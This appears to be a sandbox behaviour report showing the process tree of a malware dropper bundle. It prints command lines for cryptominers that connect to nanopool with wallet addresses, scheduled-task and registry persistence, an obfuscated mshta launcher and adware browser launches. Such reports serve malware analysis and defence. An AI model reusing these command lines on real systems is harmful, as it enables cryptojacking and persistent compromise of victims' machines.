C:\Windows\System32\conhost.exeC:\Windows/System32\conhost.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-asia1.nanopool.org:14444 --user=42Lm2CeGer8hubckgimBBXhKWRnZqtLx74Ye2HcyMyikARReDxWRn15Bia1k8qgnboPNxEZJHN5HgX8eNa1EP7xeA3X8Z7s --pass= --cpu-max-threads-hint=60 --donate-level=5 --cinit-idle-wait=5 --cinit-idle-cpu=80 --cinit-stealth12⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu21b9847cb6727.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS443F3EF3\Thu21b9847cb6727.exeThu21b9847cb6727.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu214ce31cede21.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS443F3EF3\Thu214ce31cede21.exeThu214ce31cede21.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2112 -s 3006⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu21df5caa1b78de6.exe /mixone4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS443F3EF3\Thu21df5caa1b78de6.exeThu21df5caa1b78de6.exe /mixone5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4208 -s 2366⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu2102ff6cfe07c.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS443F3EF3\Thu2102ff6cfe07c.exeThu2102ff6cfe07c.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu21568b0ab8.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS443F3EF3\Thu21568b0ab8.exeThu21568b0ab8.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"7⤵
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit8⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'9⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"8⤵
- Suspicious use of SetThreadContext
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit9⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'10⤵
- Creates scheduled task(s)
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth9⤵
-
C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"7⤵
-
C:\ProgramData\2218437.exe"C:\ProgramData\2218437.exe"8⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5712 -s 23209⤵
- Program crash
-
C:\ProgramData\6548243.exe"C:\ProgramData\6548243.exe"8⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCript:cloSe (crEateoBjECt("WscRipT.ShelL"). ruN( "cMD.EXE /c cOPY /Y ""C:\ProgramData\6548243.exe"" T2qzzHJjB1IL.eXe&& START T2QzzhJjB1IL.ExE /PcFM2d8NWvl_DASq10FK9czyFRU& iF """" == """" for %a in (""C:\ProgramData\6548243.exe"" ) do taskkill /im ""%~Nxa"" -f ",0, TRUE ) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cOPY /Y "C:\ProgramData\6548243.exe" T2qzzHJjB1IL.eXe&&START T2QzzhJjB1IL.ExE /PcFM2d8NWvl_DASq10FK9czyFRU&iF ""== "" for %a in ("C:\ProgramData\6548243.exe" ) do taskkill /im "%~Nxa" -f10⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "6548243.exe" -f11⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\7790881.exe"C:\ProgramData\7790881.exe"8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6516 -s 24449⤵
- Executes dropped EXE
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 6088⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\udptest.exe"C:\Users\Admin\AppData\Local\Temp\udptest.exe"7⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5336 -s 3168⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\2.exe"C:\Users\Admin\AppData\Local\Temp\2.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4116 -s 17248⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\DVORAK.exe"C:\Users\Admin\AppData\Local\Temp\DVORAK.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"8⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\WINsoft\43523.bat" "9⤵
-
C:\Users\Admin\AppData\Roaming\WINsoft\FoxyIDM62s.exeFoxyIDM62s.exe10⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp"C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp" -d "C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\"11⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\WINsoft\HWI.exeHWI.exe10⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\WINsoft\HWI.exeHWI.exe11⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe"C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe"12⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe"C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe"13⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\e0171c4c73\14⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\e0171c4c73\15⤵
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN sqtvvs.exe /TR "C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe" /F14⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-K0PQH.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-K0PQH.tmp\setup_2.tmp" /SL5="$2031E,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"8⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT9⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-D191S.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-D191S.tmp\setup_2.tmp" /SL5="$601E8,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT10⤵
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe" -a8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"7⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu214aaca5625.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS443F3EF3\Thu214aaca5625.exeThu214aaca5625.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-4BDJR.tmp\Thu214aaca5625.tmp"C:\Users\Admin\AppData\Local\Temp\is-4BDJR.tmp\Thu214aaca5625.tmp" /SL5="$200BE,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS443F3EF3\Thu214aaca5625.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-7AK4R.tmp\46807GHF____.exe"C:\Users\Admin\AppData\Local\Temp\is-7AK4R.tmp\46807GHF____.exe" /S /UID=burnerch27⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files\Windows NT\CIWQIJMVKZ\ultramediaburner.exe"C:\Program Files\Windows NT\CIWQIJMVKZ\ultramediaburner.exe" /VERYSILENT8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-58MB7.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-58MB7.tmp\ultramediaburner.tmp" /SL5="$304BA,281924,62464,C:\Program Files\Windows NT\CIWQIJMVKZ\ultramediaburner.exe" /VERYSILENT9⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu10⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\a6-79a3e-a90-5e995-f3fd059e91d15\Qishaelykunae.exe"C:\Users\Admin\AppData\Local\Temp\a6-79a3e-a90-5e995-f3fd059e91d15\Qishaelykunae.exe"8⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e69⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcad2346f8,0x7ffcad234708,0x7ffcad23471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad9⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcad2346f8,0x7ffcad234708,0x7ffcad23471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18514839⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcad2346f8,0x7ffcad234708,0x7ffcad23471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18515139⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcad2346f8,0x7ffcad234708,0x7ffcad23471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=20872159⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0x84,0x10c,0x7ffcad2346f8,0x7ffcad234708,0x7ffcad23471810⤵
-
C:\Users\Admin\AppData\Local\Temp\02-c1679-f8f-d3ba7-e49af83aea46a\Joculoqoqu.exe"C:\Users\Admin\AppData\Local\Temp\02-c1679-f8f-d3ba7-e49af83aea46a\Joculoqoqu.exe"8⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4aqaffmt.h0u\GcleanerEU.exe /eufive & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\4aqaffmt.h0u\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\4aqaffmt.h0u\GcleanerEU.exe /eufive10⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6808 -s 28411⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\a5iazpdk.k0c\installer.exe /qn CAMPAIGN="654" & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\a5iazpdk.k0c\installer.exeC:\Users\Admin\AppData\Local\Temp\a5iazpdk.k0c\installer.exe /qn CAMPAIGN="654"10⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kmmikxlb.lov\anyname.exe & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\kmmikxlb.lov\anyname.exeC:\Users\Admin\AppData\Local\Temp\kmmikxlb.lov\anyname.exe10⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rwqcnnwu.kc0\gcleaner.exe /mixfive & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\rwqcnnwu.kc0\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\rwqcnnwu.kc0\gcleaner.exe /mixfive10⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5608 -s 23611⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\obmibooq.mmj\autosubplayer.exe /S & exit9⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu2156de5489c19.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS443F3EF3\Thu2156de5489c19.exeThu2156de5489c19.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\tmpD1E1_tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmpD1E1_tmp.exe"6⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Windows\SysWOW64\dllhost.exedllhost.exe7⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cmd < Attesa.wmv7⤵
-
C:\Windows\SysWOW64\cmd.execmd8⤵
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^VksJcWfNcDMqfgfCCoOQaENLrlkioAEZRevWUFgpnuTZyylQxdxsqDodbFGlKiEVZMohRaHWUFajKOGYZxNRyhZgTymgZtndBYqaWXYwInbclWFIZIldx$" Braccio.wmv9⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.comAdorarti.exe.com u9⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u10⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u11⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u12⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\PING.EXEping localhost9⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu21a1ef054cac78a.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu21624565bb917a.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\sihclient.exeC:\Windows\System32\sihclient.exe /cv bIwyp2o330q1fggh9KFnew.0.21⤵
- Modifies data under HKEY_USERS
-
C:\Users\Admin\AppData\Local\Temp\7zS443F3EF3\Thu21a1ef054cac78a.exeThu21a1ef054cac78a.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1404 -s 19682⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\7zS443F3EF3\Thu21624565bb917a.exeThu21624565bb917a.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 456 -s 3162⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 4208 -ip 42081⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1132 -ip 11321⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Loads dropped DLL
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 2112 -ip 21121⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 456 -ip 4561⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 5348 -ip 53481⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 680 -p 1404 -ip 14041⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1112 -ip 11121⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 600 -p 4116 -ip 41161⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 672 -p 5336 -ip 53361⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6804 -s 4603⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 6804 -ip 68041⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 528 -p 5524 -ip 55241⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 520 -p 5712 -ip 57121⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 6516 -ip 65161⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\rUNdlL32.eXerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5020 -s 4483⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 5020 -ip 50201⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding DEA6F00B6667A6AB8BF94877CA01FBDA C2⤵
- Loads dropped DLL
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding AEE65D58201C54F9C290D6C25FA01BD62⤵
- Blocklisted process makes network request
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f3⤵
- Kills process with taskkill
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding C2416EB66124DEBFB014A95476C61E13 E Global\MSI00002⤵
- Loads dropped DLL
- Drops file in Windows directory
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 8BF079F7397D5127A0504E18054520CD C2⤵
-
